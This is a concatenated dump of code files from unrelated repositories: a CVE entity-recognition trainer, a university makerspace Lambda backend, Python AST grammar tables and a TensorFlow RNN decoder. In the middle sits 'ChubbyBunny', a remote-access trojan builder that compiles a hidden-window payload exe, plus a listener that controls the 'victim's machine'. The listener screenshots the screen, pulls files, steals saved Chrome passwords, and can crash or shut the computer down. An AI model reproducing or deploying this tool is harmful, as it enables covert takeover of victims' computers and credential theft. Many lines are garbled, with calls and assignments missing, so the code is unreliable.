= minibatch(trainset, size=compounding(4., 32., 1.001)) for batch in batches: texts, annotations = zip(*batch) nlp.update(texts, annotations, sgd=optimizer, drop=drop_rate, losses=losses) log.debug('Losses %r', losses) return nlp def get_prediction_for_description(nlp, description): doc = nlp(description) raw_predictions = [[ent.start_char, ent.end_char, ent.label_] for ent in doc.ents] formatted_prediction = defaultdict(list) for (start_idx, end_idx, label) in raw_predictions: formatted_prediction[label].append(description[start_idx: end_idx]) return formatted_prediction def get_default_model(): return spacy.load(os.path.join(os.path.dirname(__file__), 'model')) def get_default_dataset(): return _get_dataset(os.path.join(os.path.dirname(__file__), 'dataset/dataset.json')) ``` #### File: trainer/server/ ```python import csv import sys import requests API_ENDPOINT = '' def usage(): print('usage: python <path_to_csv_file>') def main(csv_path): with open(csv_path, 'r') as csv_f: data = csv.DictReader(csv_f, delimiter='\t') for cve in data: response = API_ENDPOINT + "/postNewCve", params={"cve_id": cve['CVE ID'], "cve_description": cve['Descr.']} ) if response.status_code != 200: print("Error during post of {}".format(cve['CVE ID'])) else: print("Successfully posted {}".format(cve['CVE ID'])) if __name__ == '__main__': if len(sys.argv) != 2: usage() sys.exit(-1) main(sys.argv[1]) ```
{ "source": "0BL1V10N-V01D/ChubbyBunny", "score": 3 }
#### File: 0BL1V10N-V01D/ChubbyBunny/ ```python import subprocess from shutil import copyfile import os import socket import base64 import sys import pickle import time GREEN = '\33[32m' RED = '\33[31m' END = '\33[0m' BOLD = '\33[1m' #print(GREEN + BOLD + "\nThis isn't set up yet! Very soon... Please use the '' with the github instructions instead.\n" + END) print(' ') host = input(GREEN + BOLD + 'Set LHOST IP: ' + END) port = input(GREEN + BOLD + 'Set LPORT: ' + END) name = input(GREEN + BOLD + 'Enter the basename for output files: ' + END) def createFile(): try: global copiedFile print(GREEN + BOLD + '\nCreating python file...\n') time.sleep(2) exampleFile = os.getcwd() + '/source/' copiedFile = os.getcwd() + '/output/' + name + '.py' copyfile(exampleFile, copiedFile) with open(copiedFile, 'r') as file: filedata = replaceHOST = "host = '" + host + "'" filedata = filedata.replace("host = ''", replaceHOST) with open(copiedFile, 'w') as file: file.write(filedata) with open(copiedFile, 'r') as file: filedata = replacePORT = "port = " + port filedata = filedata.replace("port = ''", replacePORT) with open(copiedFile, 'w') as file: file.write(filedata) except: print(RED + BOLD + "Couldn't create python file. Quitting...") sys.exit() def pythonToExe(): try: ico = input('\n' + GREEN + BOLD + 'Path to icon file:') print(GREEN + BOLD + '\nGenerating exe file...\n') p = subprocess.Popen(['pyinstaller', '-y', '-F', '-w', '-i', ico, '-n', name, copiedFile], cwd = 'output/') p.wait() except: print(RED + BOLD + "Couldn't create exe file. Quitting...") sys.exit() def done(): time.sleep(2) print(GREEN + BOLD + "\nDone! Saved to the 'dist' directory in the output folder!") time.sleep(2) def main(): createFile() pythonToExe() done() if __name__ == "__main__": main() ``` #### File: 0BL1V10N-V01D/ChubbyBunny/ ```python import socket import subprocess import sys import os import time import signal import readline import pickle import struct import base64 from io import StringIO, BytesIO import base64 from PIL import Image import datetime['clear']) GREEN = '\33[32m' RED = '\33[31m' YELLOW = '\33[33m' CYAN = '\033[1;36m' VIOLET = '\33[35m' BLUE = '\33[34m' END = '\33[0m' BOLD = '\33[1m' CURL = '\33[4m' restarting = (YELLOW + BOLD + '\n[!] Trying to restart... ' + END) restartTerminal = (YELLOW + BOLD + '[!] Sometimes restarting the terminal may help... ' + END) failed = (RED + BOLD + '[!] Failed!' + END) def signal_handler(sig, frame): print(RED + BOLD + '\n\nQuitting...\n' + END) sys.exit(0) def printBanner(): print(BLUE + BOLD + ' ____ ____') print(" /' | | \\") print(' / / | | \ \\') print(' / / | | | \ \\') print(' ( / | """" |\ \ ' + END + BOLD + ' Ahhh HA!!!') print(BLUE + BOLD + ' | / / /^\ /^\ \ _| ' + END + BOLD + ' I love big big carrot!!!') print(BLUE + BOLD + ' ~ | | | | | | ~') print(' | |__' + END + BOLD + 'O' + BLUE + BOLD + '|__|' + END + BOLD + 'O' + BLUE + BOLD + '__| |') print(' /~~ \/ ~~\\') print(' / ( | ) \\') print(" _--_ /, \____/^\___/' \ _--_") print(' /~ ~\ / -____-|_|_|-____-\ /~ ~\\') print(' /________|___/~~~~\___/~~~~\ __|________\\') print('--~~~ ^ | | | | - : ~~~~~:~-_ ___-----~~~~~~~~|') print(" / `^-^-^' `^-^-^' : ~\ /' ____/--------|") print(' ; : : |----------/--------|') print(': , ' + VIOLET + BOLD + 'ChubbyListener:' + RED + BOLD + ' v1.0.0' + BLUE + BOLD + ' ; . |---\\--------------|') print(' : - ' + VIOLET + BOLD + 'Writen by:' + RED + BOLD + ' 0BL1V10N V01D' + BLUE + BOLD + ' . : : |______________-__|') print(" : , , : /'~----___________|") print('__ \\\ ^ ,, ;; ;; ;._-~') print(' ~~~-----____________________________________----~~~') def socketCreate(): try: global host global port global showPort global s host = input(GREEN + BOLD + '\nSet LHOST: ' + END) port = input('\n' + GREEN + BOLD + 'Set LPORT: ' + END) port = int(port) showPort = str(port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error: print(failed) def socketBind(): try: s.bind((host, port)) except socket.error: print(failed) print(restarting) print(restartTerminal)['clear']) socketBind() def listening(): s.listen(1) print(GREEN + BOLD + '\n[*] Listening on ' + END + CYAN + host + ':' + showPort + END) def socketAccept(): global conn global addr conn, addr, = s.accept() print(GREEN + BOLD + '\n[*] Session opened at ' + END + CYAN + addr[0] + ':' + str(addr[1]) + '\n' + END) sendCommands(conn) def sendCommands(conn): while True: cmd = input(CYAN + str(addr[0]) + ':' + str(addr[1]) + ' > ' + END) if cmd == 'quit': conn.close() s.close() sys.exit() elif cmd == 'exit': conn.close() s.close() sys.exit() elif cmd == 'help': print(' ') print('Help Commands') print('=============') print(' ') print('Commands Description') print('-------- -----------') print('quit Exit script') print('exit Quit script') print('sysinfo View basic client information') print('screenshot Take a screenshot of machine') print('download -s Download screenshot to your computer') print("download -f [file] Download a .txt file from victim's machine") print("download -c Download saved password chrome file") print("openurl [url] Open a url page in the victim's machine") print("chrome Attempt to retrieve saved chrome passwords") print('memory Print phyiscal and virtual memory') print('crash Attempt to crash computer') print('lock Lock computer screen') print('shutdown Shutdown computer') print('restart Restart computer') print(' ') elif cmd == 'sysinfo': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print(clientResponse) elif cmd == 'clear':['clear']) elif cmd == '': pass elif cmd == 'shutdown': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print(clientResponse) elif cmd == 'restart': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print(clientResponse) elif cmd == 'memory': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), 'utf-8') print(clientResponse) print(' ') elif cmd[:7] == 'openurl': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print(clientResponse) elif cmd == 'crash': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print(clientResponse) elif cmd[:4] == 'lock': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print('\n' + clientResponse, end="") elif cmd[:11] == 'download -f': try: conn.send(str.encode(cmd)) print('\n' + YELLOW + "[!] Please use this for 'txt' or other document file transfers. Use 'download -s' to transfer a taken screenshot. Type Q to quit." + END) print(YELLOW + "[!] Recommended download size is no more than 3GBs! ") filename = input('\n' + CYAN + '[*] Please enter a filename for the incoming file: ' + END + GREEN) file = open('downloads/' + filename, 'wb') file_data = conn.recv(1024) print(GREEN + BOLD + '\n' + '[*] Downloading...' + END) file.write(file_data) file.close() print(GREEN + BOLD + '[*] Downloaded successfully to downloads/' + filename + END) except: print(RED + BOLD + '[!] There was an error downloading your file.' + END) pass elif cmd == 'screenshot': conn.send(str.encode(cmd)) clientResponse = str(conn.recv(1024), "utf-8") print('\n' + clientResponse, end='') elif cmd == 'download -s': print(' ') print(GREEN + BOLD + '[*] Transfering screenshot... This can take up to 20 seconds...' + END) conn.send(str.encode(cmd)) data = b"" payload_size = struct.calcsize(">L") #print("payload_size: {}".format(payload_size)) while len(data) < payload_size: #print("Recv: {}".format(len(data))) data += conn.recv(8192) #print("Done Recv: {}".format(len(data))) packed_msg_size = data[:payload_size] data = data[payload_size:] msg_size = struct.unpack(">L", packed_msg_size)[0] #print("msg_size: {}".format(msg_size)) while len(data) < msg_size: data += conn.recv(8192) frame_data = data[:msg_size] data = data[msg_size:] frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes") frame = base64.b64decode(frame) img = imgname = 'downloads/screenshot' + str( + '.png' print(GREEN + BOLD + '[*] Screenshot output in ' + END + CYAN + imgname + END) print(' ') elif cmd == 'chrome': conn.send(str.encode(cmd)) print('') print(GREEN + BOLD + "[*] Type 'download', let's see if this worked!") print('') elif cmd == 'download -c': try: conn.send(str.encode(cmd)) print('\n' + YELLOW + "[!] Please use this for 'txt' or other document file transfers. Use 'download -s' to transfer a taken screenshot. Type Q to quit." + END) print(YELLOW + "[!] Recommended download size is no more than 3GBs! ") filename = input('\n' + CYAN + '[*] Please enter a filename for the incoming file: ' + END + GREEN) file = open(filename, 'wb') file_data = conn.recv(1024) print(GREEN + BOLD + '\n' + '[*] Downloading...' + END) file.write(file_data) file.close() print(GREEN + BOLD + '[*] Downloaded successfully to ' + filename + END + '\n') except: print(RED + BOLD + '[!] There was an error downloading your file (Error is in server source code).' + END + '\n') pass def main(): signal.signal(signal.SIGINT, signal_handler) printBanner() socketCreate() socketBind() listening() socketAccept() if __name__ == '__main__': main() ```
{ "source": "0brandy0/unified-makerspace-1", "score": 2 }
#### File: lambda_code/log_visit/ ```python import json import datetime from pydoc import cli import boto3 from boto3.dynamodb.conditions import Key from botocore.exceptions import ClientError import logging import traceback import sys import os import re class LogVisitFunction(): """ This function will be used to wrap the functionality of the lambda so we can more easily test with pytest. """ def __init__(self, table, ses_client): self.logger = logging.getLogger() self.logger.setLevel(logging.INFO) if table is None: # Get the service resource. dynamodb = boto3.resource('dynamodb') # Get the table name. TABLE_NAME = os.environ["TABLE_NAME"] # Get table objects self.visits = dynamodb.Table(TABLE_NAME) else: self.visits = table if ses_client is None: AWS_REGION = os.environ['AWS_REGION'] self.client = boto3.client('ses', region_name=AWS_REGION) else: self.client = ses_client def checkRegistration(self, current_user): response = self.visits.query( KeyConditionExpression=Key('PK').eq(current_user) ) return response['Count'] # This code was written following the example from: # def registrationWorkflow(self, current_user): # This address must be verified with Amazon SES. SENDER = "<EMAIL>" email_regex = re.compile(r"[^@]+@[^@]+\.[^@]+") if not email_regex.match(current_user): current_user = current_user + "" RECIPIENT = current_user # One could consider using a configuration set here. # To learn more about them please visit: # SUBJECT = "Clemson University Makerspace Registration" BODY_TEXT = ("Hello " + current_user + ",\n" "Our records indicate that you have not registered as an existing user.\n" "Please go to to register as an existing user.\n" ) # The character encoding for the email. CHARSET = "UTF-8" # Create a new SES resource and specify a region. # Try to send the email. try: response = self.client.send_email( Destination={ 'ToAddresses': [ RECIPIENT, ], }, Message={ 'Body': { 'Text': { 'Charset': CHARSET, 'Data': BODY_TEXT, }, }, 'Subject': { 'Charset': CHARSET, 'Data': SUBJECT, }, }, ReplyToAddresses=["<EMAIL>"], Source=SENDER, # If we were using a configuration set we would need the following line. # ConfigurationSetName=CONFIGURATION_SET, ) # Display an error if something goes wrong. except ClientError as e: self.logger.error(e.response['Error']['Message']) def addVisitEntry(self, current_user, location): # Get the current date at which the user logs in. visit_date = # Add the item to the table. response = self.visits.put_item( # PK = Partition Key = Visit Date # SK = Sort Key = Username or Email Address Item={ 'PK': str(visit_date), 'SK': current_user, 'location': location, }, ) return response['ResponseMetadata']['HTTPStatusCode'] def handle_log_visit_request(self, request, context): """ Log the input of a user (namely, the username) from the makerspace console. This should: 1. Check whether this user has visited before by looking for a sentinel record in the table 2. Trigger a registration workflow if this is the first time for that user 3. Place a visit entry into the table """ # return client error if no string params HEADERS = { 'Content-Type': 'application/json', 'Access-Control-Allow-Headers': 'Content-Type', 'Access-Control-Allow-Origin': os.environ["DOMAIN_NAME"], 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET' } if (request is None): return { 'headers': HEADERS, 'statusCode': 400, 'body': json.dumps({ "Message": "Failed to provide parameters" }) } try: # Get the username from the request body. username = json.loads(request["body"])["username"] location = ' ' try: location = json.loads(request["body"])["location"] except Exception as e: exception_type, exception_value, exception_traceback = sys.exc_info() traceback_string = traceback.format_exception( exception_type, exception_value, exception_traceback) err_msg = json.dumps({ "errorType": "MissingParameter", "errorMessage": "Missing parameter: location", "errorTrace": traceback_string }) self.logger.warn(err_msg) # Check if this user has registered before. registration = self.checkRegistration(username) # If the user is not in the system, send a registration link. if registration == 0: self.registrationWorkflow(username) # One could consider setting res = some other number here in order to # bring up a page That lets the user know in order to sign in they # have to check their email and register with the Makerspace. # Call Function res = self.addVisitEntry(username, location) # Send response return { 'headers': HEADERS, 'statusCode': res } except Exception as e: # Return exception with response return { 'headers': HEADERS, 'statusCode': 500, 'body': json.dumps({ 'Message': str(e) }) } log_visit_function = LogVisitFunction(None, None) def handler(request, context): # This will be hit in prod, and will connect to the stood-up dynamodb # and Simple Email Service clients. return log_visit_function.handle_log_visit_request(request, context) ``` #### File: lambda_code/register_user/ ```python import json import boto3 from boto3.dynamodb.conditions import Key import os import datetime class RegisterUserFunction(): """ This class wraps the function of the lambda so we can more easily test it with moto. In production, we will continue to pass the stood-up dynamodb table to the handler itself. However, when initializing this class, we can choose to instead initialize it with a mocked version of the dynamodb table. """ def __init__(self, table): if table is None: # Default Behavior in Prod # Get the service resource. dynamodb = boto3.resource('dynamodb') # Get the table name. TABLE_NAME = os.environ["TABLE_NAME"] # Get table objects self.users = dynamodb.Table(TABLE_NAME) else: self.users = table def addUserInfo(self, user_info): # Get the current date at which the user registers. timestamp = response = self.users.put_item( Item={ 'PK': user_info['username'], 'SK': str(timestamp), 'firstName': user_info['firstName'], 'lastName': user_info['lastName'], 'Gender': user_info['Gender'], 'DOB': user_info['DOB'], 'Grad_date': user_info['Grad_Date'], 'Major': ', '.join(sorted(user_info['Major'])), 'Minor': ', '.join(sorted(user_info.get('Minor', []))) }, ) return response['ResponseMetadata']['HTTPStatusCode'] def handle_register_user_request(self, request, context): HEADERS = { 'Content-Type': 'application/json', 'Access-Control-Allow-Headers': 'Content-Type', 'Access-Control-Allow-Origin': os.environ["DOMAIN_NAME"], 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET' } if (request is None): return { 'headers': HEADERS, 'statusCode': 400, 'body': json.dumps({ "Message": "Failed to provide parameters" }) } # Get all of the user information from the json file user_info = json.loads(request["body"]) # Call Function response = self.addUserInfo(user_info) # Send response return { 'headers': HEADERS, 'statusCode': response } register_user_function = RegisterUserFunction(None) def handler(request, context): # Register user information from the makerspace/register console # Since this will be hit in prod, it will go ahead and hit our prod # dynamodb table return register_user_function.handle_register_user_request( request, context) ```
{ "source": "0bserver07/neural-engineers-first-attempt", "score": 3 }
#### File: load_d2c_data/_ast_final/ ```python '''AbstractProgramSet class design from''' '''Star takes/transforms multiple parameters as/into a list, passing no parameters to star results in "[]" ''' '''Question Mark takes/transforms multiple parameters as/into a tuple, passing no parameters to star results in "None" ''' '''No ?/* takes exactly one argument''' import string import ast from ast import * from astmonkey import visitors, transformers import re import numpy as np import collections from collections import OrderedDict class Program: output_to_env = False def __init__(self, name, *args): = name self.args = args #print self.args self.program_id = None '''self.variadic_args = [list containing names of which arguments are variadic (can be None if None are variadic)]''' def description_with_args(self, args): int_args = args.decode_all() return "%s(%s)" % (, ", ".join([str(x) for x in int_args])) def to_one_hot(self, size, dtype=np.float): ret = np.zeros((size,), dtype=dtype) ret[self.program_id] = 1 return ret def do(self, env, args): raise NotImplementedError() def __str__(self): ''' return "<Program: name=%s>" % ''' return class AbstractProgramSet: def __init__(self): self.program_map = {} self.program_id = 0 def register(self, pg): pg.program_id = self.program_id self.program_map[pg.program_id] = pg self.program_id += 1 def create_and_register_all(self, all_pgs_in_class): for i in all_pgs_in_class: self.register(Program(i, *all_pgs_in_class[i])) def get(self, i): return self.program_map.get(i) def get_arguments(self, i): return self.program_map.get(i).args mod_dict = {"Module": ['stmt* body'], "Interactive": ['stmt* body'], "Expression": ['expr body'], "Suite": ['stmt* body'], } stmt_dict = {"FunctionDef": ['identifier name', 'arguments args', 'stmt* body', 'expr* decorator_list'], "ClassDef": ['identifier name', 'expr* bases', 'stmt* body', 'expr* decorator_list'], "Return": ['expr? value'], "Delete": ['expr* targets'], "Assign": ['expr* targets', 'expr value'], "AugAssign": ['expr target', 'operator op', 'expr value'], "Print": ['expr? dest', 'expr* values', 'bool nl'], "For": ['expr target', 'expr iter', 'stmt* body', 'stmt* orelse'], "While": ['expr test', 'stmt* body', 'stmt* orelse'], "If": ['expr test', 'stmt* body', 'stmt* orelse'], "With": ['expr context_expr', 'expr? optional_vars', 'stmt* body'], "Raise": ['expr? type', 'expr? inst', 'expr? tback'], "TryExcept": ['stmt* body', 'excepthandler* handlers', 'stmt* orelse'], "TryFinally": ['stmt* body', 'stmt* finalbody'], "Assert": ['expr test', 'expr? msg'], "Import": ['alias* names'], "ImportFrom": ['identifier? module', 'alias* names', 'int? level'], "Exec": ['expr body', 'expr? globals', 'expr? locals'], "Global": ['identifier* names'], "Expr": ['expr value'], "Pass": [], "Break": [], #"attributes": ['int lineno', 'int col_offset'], } expr_dict = {"BoolOp": ['boolop op', 'expr* values'], "BinOp": ['expr left', 'operator op', 'expr right'], "UnaryOp": ['unaryop op', 'expr operand'], "Lambda": ['arguments args', 'expr body'], "IfExp": ['expr test', 'expr body', 'expr orelse'], "Dict": ['expr* keys', 'expr* values'], "Set": ['expr* elts'], "ListComp": ['expr elt', 'comprehension* generators'], "SetComp": ['expr elt', 'comprehension* generators'], "DictComp": ['expr key', 'expr value', 'comprehension* generators'], "GeneratorExp": ['expr elt', 'comprehension* generators'], "Yield": ['expr? value'], "Compare": ['expr left', 'cmpop* ops', 'expr* comparators'], "Call": ['expr func', 'expr* args', 'keyword* keywords, expr? starargs', 'expr? kwargs'], "Repr": ['expr value'], "Num": ['object n'], "Str": ['string s'], "Attribute": ['expr value', 'identifier attr', 'expr_context ctx'], "Subscript": ['expr value', 'slice slice', 'expr_context ctx'], "Name": ['identifier id', 'expr_context ctx'], "List": ['expr* elts', 'expr_context ctx'], "Tuple": ['expr* elts', 'expr_context ctx'], #"attributes": ['int lineno', 'int col_offset'], } expr_context_dict = {"Load": [], "Store": [], "Del": [], "AugLoad": [], "AugStore": [], "Param": []} slice_dict = {"Ellipsis": [], "Slice": ['expr? lower', 'expr? upper', 'expr? step'], "ExtSlice": ['slice* dims'], "Index": ['expr value'], } boolop_dict = {"And": [], "Or": []} operator_dict = {"Add": [], "Sub": [], "Mult": [], "Div": [], "Mod": [], "Pow": [], "LShift": [], "RShift": [], "BitOr": [], "BitXor": [], "BitAnd": [], "FloorDiv": []} unaryop_dict = {"Invert": [], "Not": [], "UAdd": [], "USub": []} cmpop_dict = {"Eq": [], "NotEq": [], "Lt": [], "LtE": [], "Gt": [], "GtE": [], "Is": [], "IsNot": [], "In": [], "NotIn": []} comprehension_dict = {"comprehension": ['expr target', 'expr iter', 'expr* ifs']} excepthandler_dict = {"ExceptHandler": ['expr? type', 'expr? name', 'stmt* body'], "attributes ": ['int lineno', 'int col_offset']} arguments_dict = {"arguments": ['expr* args', 'identifier? vararg', 'identifier? kwarg', 'expr* defaults']} keyword_dict = {"keyword": ['identifier arg', 'expr value']} alias_dict = {"alias": ['identifier name', 'identifier? asname']} bool_dict = '''True/False''' '''below are built_in_types that skip the class and jump straight to function''' '''e.g. looks like ='turnt' or =12 instead of looking like =Load() or =Store()''' '''if one these, rnn needs to generate or copy a sequence of character''' #identifier #int #string #object #bool #selects True or False #ones that take string with quotes are string, identifier #string can be any character(s) #identifier can only start with letter and _ and can only consist of those and num #ones that take string without quotes are int, object #int can only be numbers, 'L', '-' #object can only be numbers, 'L' decimal_point, 'e', '+', '-' program_classes_list = ['mod', 'stmt', 'expr', 'expr_context', 'slice', 'boolop', 'operator', 'unaryop', 'cmpop', 'comprehension', 'excepthandler', 'arguments', 'keyword', 'alias'] program_classes = {} '''THIS LOOP SHOULD PROBABLY BE PUT IN A CLASS OR FUNCTION''' for i in program_classes_list: program_classes[i] = AbstractProgramSet() exec("program_classes[i].create_and_register_all(%s)" % (i+"_dict")) def to_one_hot(program_id, size, dtype=np.float): ret = np.zeros((size,), dtype=dtype) ret[program_id] = 1 return ret def get_pc_index(key_name): for i in range(len(program_classes.keys())): if program_classes.keys()[i] == str(key_name): return i def get_p_index(pc_name, p_name): for i in range(0, program_classes[pc_name].program_id): if str(program_classes[pc_name].get(i)) == str(p_name): return i args_demo = ('expr* args', 'identifier? vararg', 'identifier? kwarg', 'expr* defaults') arg_amount_dic = {1: '', 2: '*', 3: '?'} '''I think this is used to let rnn know how many arguments it's selecting''' def argument_parser(arguments): parse_args =[] for argument in arguments: parse_args.append(re.split(' ', argument)) return parse_args #print argument_parser(args_demo) ``` #### File: 0bserver07/neural-engineers-first-attempt/ ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function from functools import partial import tensorflow as tf from tensorflow.contrib.layers import fully_connected from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import rnn from tensorflow.python.ops import tensor_array_ops from tensorflow.python.ops import variable_scope as vs __all__ = ["rnn_decoder", "rnn_decoder_attention"] """Used to project encoder state in `rnn_decoder`""" encoder_projection = partial(fully_connected, activation_fn=math_ops.tanh) def rnn_decoder(cell, decoder_inputs, initial_state, sequence_length, decoder_fn, encoder_projection=encoder_projection, parallel_iterations=None, swap_memory=False, time_major=False, scope=None): """RNN decoder for a sequence-to-sequence model specified by RNNCell 'cell'. The 'rnn_decoder' is similar to the 'tf.python.ops.rnn.dynamic_rnn'. As the decoder does not make any assumptions of sequence length of the input or how many steps it can decode, since 'rnn_decoder' uses dynamic unrolling. This allows `decoder_inputs` to have [None] in the sequence length of the decoder inputs. The parameter decoder_inputs is nessesary for both training and evaluation. During training it is feed at every timestep. During evaluation it is only feed at time==0, as the decoder needs the `start-of-sequence` symbol, known from Sutskever et al., 2014, at the beginning of decoding. The parameter sequence length is nessesary as it determines how many timesteps to decode for each sample. TODO: Could make it optional for training. Args: cell: An instance of RNNCell. inputs: The RNN inputs. If `time_major == False` (default), this must be a `Tensor` of shape: `[batch_size, max_time, ...]`. If `time_major == True`, this must be a `Tensor` of shape: `[max_time, batch_size, ...]`. The input to `cell` at each time step will be a `Tensor` with dimensions `[batch_size, ...]`. sequence_length: An int32/int64 vector sized `[batch_size]`. initial_state: An initial state for the RNN. Must be [batch_size, num_features], where num_features does not have to match the cell.state_size. As a projection is performed at the beginning of the decoding. decoder_fn: A function that takes a state and returns an embedding. The decoder function is closely related to `_extract_argmax_and_embed`. Here is an example of a `decoder_fn`: def decoder_fn(embeddings, weight, bias): def dec_fn(state): prev = tf.matmul(state, weight) + bias return tf.gather(embeddings, tf.argmax(prev, 1)) return dec_fn encoder_projection: (optional) given that the encoder might have a different size than the decoder, we project the intial state as described in Bahdanau, 2014 ( The optional `encoder_projection` is a `tf.contrib.layers.fully_connected` with `activation_fn=tf.python.ops.nn.tanh`. parallel_iterations: (Default: 32). The number of iterations to run in parallel. Those operations which do not have any temporal dependency and can be run in parallel, will be. This parameter trades off time for space. Values >> 1 use more memory but take less time, while smaller values use less memory but computations take longer. swap_memory: Transparently swap the tensors produced in forward inference but needed for back prop from GPU to CPU. This allows training RNNs which would typically not fit on a single GPU, with very minimal (or no) performance penalty. time_major: The shape format of the `inputs` and `outputs` Tensors. If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`. If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`. Using `time_major = True` is a bit more efficient because it avoids transposes at the beginning and end of the RNN calculation. However, most TensorFlow data is batch-major, so by default this function accepts input and emits output in batch-major form. scope: VariableScope for the created subgraph; defaults to "RNN". Returns: A pair (outputs, state) where: outputs: The RNN output `Tensor`. If time_major == False (default), this will be a `Tensor` shaped: `[batch_size, max_time, cell.output_size]`. If time_major == True, this will be a `Tensor` shaped: `[max_time, batch_size, cell.output_size]`. state: The final state. If `cell.state_size` is an int, this will be shaped `[batch_size, cell.state_size]`. If it is a `TensorShape`, this will be shaped `[batch_size] + cell.state_size`. Raises: TypeError: If `cell` is not an instance of RNNCell. """ with vs.variable_scope(scope or "decoder") as varscope: # Project initial_state as described in Bahdanau et al. 2014 # state = encoder_projection(initial_state, cell.output_size) # Setup of RNN (dimensions, sizes, length, initial state, dtype) # Setup dtype dtype = state.dtype if not time_major: # [batch, seq, features] -> [seq, batch, features] decoder_inputs = array_ops.transpose(decoder_inputs, perm=[1, 0, 2]) # Get data input information batch_size = array_ops.shape(decoder_inputs)[1] decoder_input_depth = int(decoder_inputs.get_shape()[2]) # Setup decoder inputs as TensorArray decoder_inputs_ta = tensor_array_ops.TensorArray(dtype, size=0, dynamic_size=True) decoder_inputs_ta = decoder_inputs_ta.unpack(decoder_inputs) # Define RNN: loop function for training. # This will run in the while_loop of 'raw_rnn' def loop_fn_train(time, cell_output, cell_state, loop_state): emit_output = cell_output if cell_output is None: next_cell_state = state # use projection of prev encoder state else: next_cell_state = cell_state elements_finished = (time >= sequence_length) # TODO handle seq_len=None finished = math_ops.reduce_all(elements_finished) # Next input must return zero state for last element explanation below # next_input = control_flow_ops.cond( finished, lambda: array_ops.zeros([batch_size, decoder_input_depth], dtype=dtype), lambda: next_loop_state = None return (elements_finished, next_input, next_cell_state, emit_output, next_loop_state) # Define RNN: loop function for evaluation. # This will run in the while_loop of 'raw_rnn' def loop_fn_eval(time, cell_output, cell_state, loop_state): emit_output = cell_output if cell_output is None: next_cell_state = state # use projection of prev encoder state else: next_cell_state = cell_state elements_finished = (time >= sequence_length) # TODO handle seq_len=None finished = math_ops.reduce_all(elements_finished) # Next input must return zero state for last element explanation below # next_input = control_flow_ops.cond( finished, lambda: array_ops.zeros([batch_size, decoder_input_depth], dtype=dtype), lambda: control_flow_ops.cond(math_ops.greater(time, 0), lambda: decoder_fn(next_cell_state), # Gather max prediction. lambda: # Read <EOS> tag next_loop_state = None return (elements_finished, next_input, next_cell_state, emit_output, next_loop_state) # Run raw_rnn function outputs_ta_train, _, _ = \ rnn.raw_rnn(cell, loop_fn_train, parallel_iterations=parallel_iterations, swap_memory=swap_memory, scope=varscope) # Reuse the cell for evaluation varscope.reuse_variables() outputs_ta_eval, _, _ = \ rnn.raw_rnn(cell, loop_fn_eval, parallel_iterations=parallel_iterations, swap_memory=swap_memory, scope=varscope) outputs_train = outputs_ta_train.pack() outputs_eval = outputs_ta_eval.pack() if not time_major: # [seq, batch, features] -> [batch, seq, features] outputs_train = array_ops.transpose(outputs_train, perm=[1, 0, 2]) outputs_eval = array_ops.transpose(outputs_eval, perm=[1, 0, 2]) return outputs_train, outputs_eval def rnn_decoder_attention(*args, **kwargs): pass def rnn_decoder_simple(cell, decoder_inputs, initial_state, loop_function=None, scope=None): """RNN decoder for the sequence-to-sequence model. Args: decoder_inputs: A list of 2D Tensors [batch_size x input_size]. initial_state: 2D Tensor with shape [batch_size x cell.state_size]. cell: rnn_cell.RNNCell defining the cell function and size. loop_function: If not None, this function will be applied to the i-th output in order to generate the i+1-st input, and decoder_inputs will be ignored, except for the first element ("GO" symbol). This can be used for decoding, but also for training to emulate Signature -- loop_function(prev, i) = next * prev is a 2D Tensor of shape [batch_size x output_size], * i is an integer, the step number (when advanced control is needed), * next is a 2D Tensor of shape [batch_size x input_size]. scope: VariableScope for the created subgraph; defaults to "rnn_decoder". Returns: A tuple of the form (outputs, state), where: outputs: A list of the same length as decoder_inputs of 2D Tensors with shape [batch_size x output_size] containing generated outputs. state: The state of each cell at the final time-step. It is a 2D Tensor of shape [batch_size x cell.state_size]. (Note that in some cases, like basic RNN cell or GRU cell, outputs and states can be the same. They are different for LSTM cells though.) """ with vs.variable_scope(scope or "rnn_decoder"): state = initial_state outputs = [] prev = None for i, inp in enumerate(decoder_inputs): if loop_function is not None and prev is not None: with vs.variable_scope("loop_function", reuse=True): inp = loop_function(prev, i) if i > 0: vs.get_variable_scope().reuse_variables() output, state = cell(inp, state) outputs.append(output) if loop_function is not None: prev = output return outputs, state class CustomCell(tf.nn.rnn_cell.RNNCell): """Gated Recurrent Unit cell (cf.""" def __init__(self, num_units, num_weights): self._num_units = num_units self._num_weights = num_weights @property def state_size(self): return self._num_units @property def output_size(self): return self._num_units def __call__(self, inputs, state, scope=None): with tf.variable_scope(scope or type(self).__name__): # "GRUCell" with tf.variable_scope("Gates"): # Reset gate and update gate. # We start with bias of 1.0 to not reset and not update. ru = tf.nn.rnn_cell._linear([inputs, state], 2 * self._num_units, True, 1.0) ru = tf.nn.sigmoid(ru) r, u = tf.split(1, 2, ru) with tf.variable_scope("Candidate"): lambdas = tf.nn.rnn_cell._linear([inputs, state], self._num_weights, True) lambdas = tf.split(1, self._num_weights, tf.nn.softmax(lambdas)) Ws = tf.get_variable("Ws", shape=[self._num_weights, inputs.get_shape()[1], self._num_units]) Ws = [tf.squeeze(i) for i in tf.split(0, self._num_weights, Ws)] candidate_inputs = [] for idx, W in enumerate(Ws): candidate_inputs.append(tf.matmul(inputs, W) * lambdas[idx]) Wx = tf.add_n(candidate_inputs) c = tf.nn.tanh(Wx + tf.nn.rnn_cell._linear([r * state], self._num_units, True, scope="second")) new_h = u * state + (1 - u) * c return new_h, new_h ``` #### File: scrapers/codechef/ ```python import shutil import os import re import requests import urllib2 from pprint import pprint from bs4 import BeautifulSoup import html2text import time import argparse import concurrent.futures def 